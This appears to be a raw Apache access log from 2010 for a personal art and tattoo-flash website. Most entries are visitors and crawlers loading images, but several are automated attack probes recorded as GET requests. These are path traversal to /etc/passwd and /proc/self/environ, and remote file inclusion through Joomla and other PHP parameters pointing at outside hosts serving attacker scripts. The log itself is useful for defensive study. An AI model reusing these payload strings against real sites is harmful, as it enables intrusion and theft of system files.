68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/fakir.jpg HTTP/1.1" 200 22839 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/msgr.jpg HTTP/1.1" 200 18047 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/eagle-installed.png HTTP/1.1" 200 45593 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/boxfishstack.png HTTP/1.1" 200 44901 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/tackyservice.jpg HTTP/1.1" 200 36999 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/ballerina_sailfish.png HTTP/1.1" 200 54573 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/totems2.png HTTP/1.1" 200 65973 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/don%27t_tread_on_us.png HTTP/1.1" 200 52753 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/cat-in-cage.png HTTP/1.1" 200 56736 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/spikemask.png HTTP/1.1" 200 59637 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/tightfishwalker.jpg HTTP/1.1" 200 56881 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/totems.jpg HTTP/1.1" 200 76206 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:57 -0500] "GET /artwork/temptation1.jpg HTTP/1.1" 200 65929 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:55:02 -0500] "GET /artwork/fish2.jpg HTTP/1.1" 304 - "http://www.bing.com/images/search?q=Fish+Art+Work&FORM=R5FD16""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:55:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
87.250.255.243 - - [01/May/2010:21:56:09 -0500] "GET /logs/access_log.1257724800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
24.22.160.206 - - [01/May/2010:21:58:02 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&source=hp&q=vintage+tattoo+flash&aq=2&aqi=g10&aql=&oq=vintage+tattoo&gs_rfai=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:02 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:08 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:08 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:08 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:09 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:09 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:09 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:09 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:09 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:09 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:09 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:09 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:37 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:37 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:38 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:38 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:38 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:38 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:38 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:38 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:38 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:38 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:58:38 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:10 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:11 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:11 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:11 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:11 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:12 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:12 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:12 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:12 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:12 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:12 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:57 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:57 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:57 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:57 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:57 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:58 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:58 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:58 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:58 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:58 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:21:59:58 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
121.88.4.141 - - [01/May/2010:22:00:09 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.88.4.141 - - [01/May/2010:22:00:10 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
24.22.160.206 - - [01/May/2010:22:00:31 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:22:00:32 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:22:00:32 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:22:00:32 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
24.22.160.206 - - [01/May/2010:22:00:55 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
121.254.228.21 - - [01/May/2010:22:01:32 -0500] "GET /logs///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:22:01:33 -0500] "GET /logs/access_log.1268611200///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:22:01:33 -0500] "GET ///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.88.4.141 - - [01/May/2010:22:03:15 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.254.228.21 - - [01/May/2010:22:03:34 -0500] "GET /logs/access_log.1270684800%20%20///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:22:03:34 -0500] "GET /logs///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:22:03:34 -0500] "GET ///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
81.52.143.29 - - [01/May/2010:22:04:28 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
220.80.108.70 - - [01/May/2010:22:05:28 -0500] "GET /logs/access_log.1212451200//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
220.80.108.70 - - [01/May/2010:22:05:28 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
220.80.108.70 - - [01/May/2010:22:05:29 -0500] "GET /logs//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.59.164.98 - - [01/May/2010:22:06:35 -0500] "GET /logs/access_log.1262304000///index.php?cmd&file=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.59.164.98 - - [01/May/2010:22:06:35 -0500] "GET /logs///index.php?cmd&file=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
209.59.164.98 - - [01/May/2010:22:06:35 -0500] "GET ///index.php?cmd&file=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
209.59.164.98 - - [01/May/2010:22:07:08 -0500] "GET /logs/access_log.1263427200///index.php?cmd&file=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:22:09:21 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
121.254.228.21 - - [01/May/2010:22:10:35 -0500] "GET ///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:22:10:35 -0500] "GET /logs///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:22:10:35 -0500] "GET /logs/access_log.1268611200%20%20///administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
219.26.133.6 - - [01/May/2010:22:12:50 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://images.google.co.jp/imglanding?q=sailor%20jerry&imgurl=http://cdn2.ioffer.com/img/item/766/748/06/o_Grpa5GsyuDBKpun.jpg&imgrefurl=http://www.ioffer.com/si/sailor%2Bdog&usg=__UHcyPfVugS4WMOa-Uddf1wRcRc0=&h=346&w=580&sz=53&hl=ja&itbs=1&tbnid=x6KF2IMuWcSZkM:&tbnh=80&tbnw=134&prev=/images%3Fq%3Dsailor%2Bjerry%26tbnid%3DgBfZpuTK6FxUJM%26tbnh%3D0%26tbnw%3D0%26hl%3Dja%26sa%3DX%26gbv%3D2%26ndsp%3D21%26imgtype%3Di_similar%26tbs%3Disch:1&tbnid=gBfZpuTK6FxUJM&tbnh=0&tbnw=0&sa=X&gbv=2&ndsp=21&imgtype=i_similar&tbs=isch:1&start=0""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
99.39.2.249 - - [01/May/2010:22:13:00 -0500] "GET //microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.834"
87.250.255.243 - - [01/May/2010:22:22:23 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
110.45.145.92 - - [01/May/2010:22:23:30 -0500] "GET /logs/access_log.1212451200/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
110.45.145.92 - - [01/May/2010:22:23:30 -0500] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.145.92 - - [01/May/2010:22:23:31 -0500] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
208.115.111.248 - - [01/May/2010:22:27:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [01/May/2010:22:32:09 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
194.150.236.81 - - [01/May/2010:22:35:40 -0500] "GET //poll/poll_ssi.php?include_path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
194.150.236.81 - - [01/May/2010:22:35:40 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
194.150.236.81 - - [01/May/2010:22:35:40 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
115.68.20.197 - - [01/May/2010:22:35:42 -0500] "GET /logs/access_log.1212451200/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
115.68.20.197 - - [01/May/2010:22:35:43 -0500] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
115.68.20.197 - - [01/May/2010:22:35:44 -0500] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
194.150.236.81 - - [01/May/2010:22:35:56 -0500] "GET /logs/access_log.1270684800//poll/poll_ssi.php?include_path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
194.150.236.81 - - [01/May/2010:22:38:32 -0500] "GET /logs/access_log.1270684800%20%20//poll/poll_ssi.php?include_path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
194.150.236.81 - - [01/May/2010:22:38:35 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
